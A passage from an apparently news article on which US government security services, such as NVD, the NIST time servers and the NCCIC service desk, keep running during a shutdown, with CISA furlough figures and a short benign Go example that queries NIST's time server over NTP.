NVD is a repository of security checklists, software security vulnerabilities, and misconfigurations that helps organizations understand and prioritize the issues they need to mitigate. Outside of government, enterprises rely on the NIST time servers to keep their infrastructure synchronized so that they can correlate transactions across systems, log events accurately, and make sure tasks complete at the right time and in the proper order.
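Synchronizing a machine against those servers typically amounts to a single NTP query. As a minimal illustration, the Go sketch below uses the open source github.com/beevik/ntp package, one of several community NTP client libraries, to fetch the current time from NIST.

    package main

    import (
        "fmt"
        "log"

        "github.com/beevik/ntp" // community NTP client package
    )

    func main() {
        // Query one of NIST's public time servers over NTP.
        t, err := ntp.Time("time.nist.gov")
        if err != nil {
            log.Fatal(err)
        }
        fmt.Println("NIST time:", t)
    }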

“NIST time and frequency operations in Boulder, Ft. Collins, and Kauai are required to continue for reasons of national security (universal time coordination), national economy (e.g. Security Exchange Commission requirements), and national timing and synchronization infrastructure (e.g. millions of radio-controlled clocks),” said the Department of Commerce in its planning documents.

While much of the Small Business Administration will be closed, small businesses will be able to continue accessing security recommendations and guidance from the website. If small businesses have specific questions or need assistance with security matters, the National Cybersecurity and Communications Integration Center (NCCIC) service desk is open and accepting calls (as of Dec. 31).

All services of the National Technical Information Service will stay up and running.

At Reduced Capacity

It is an uncomfortable fact that the shutdown means the government’s security capabilities are reduced. The Department of Homeland Security’s newly established Cybersecurity and Infrastructure Security Agency has 45 percent of its employees furloughed, and approximately 45 percent of Homeland Security's analysis and operations team—which encompasses the Office of Intelligence and Analysis and the Office of Operations Coordination—is on furlough as well. I&A provides security intelligence to public and private sector partners and develops intelligence from those partners for DHS and the intelligence community.

Just because important services are available and security-related functions are up and running doesn’t mean there is nothing to worry about. The longer it takes for the government to reopen, the greater the chances that agencies operating on short-term reserves will run out of cash on hand, at which point they will be forced to shutter some of these services.

Security is challenging enough when fully-staffed and fully-funded. Trying to keep networks and data safe and thwarting attacks when not at full-strength is risky, especially when no one can predict how long this state of affairs will last.

Editor's Note: The original version of this story incorrectly referenced an older plan regarding the National Protection and Programs Directorate. When CISA was created in 2018, NPPD was reorganized into the new agency. The story has been updated to remove references to NPPD.

Header image credit: Photo by Marco Bianchetti on Unsplash

]]>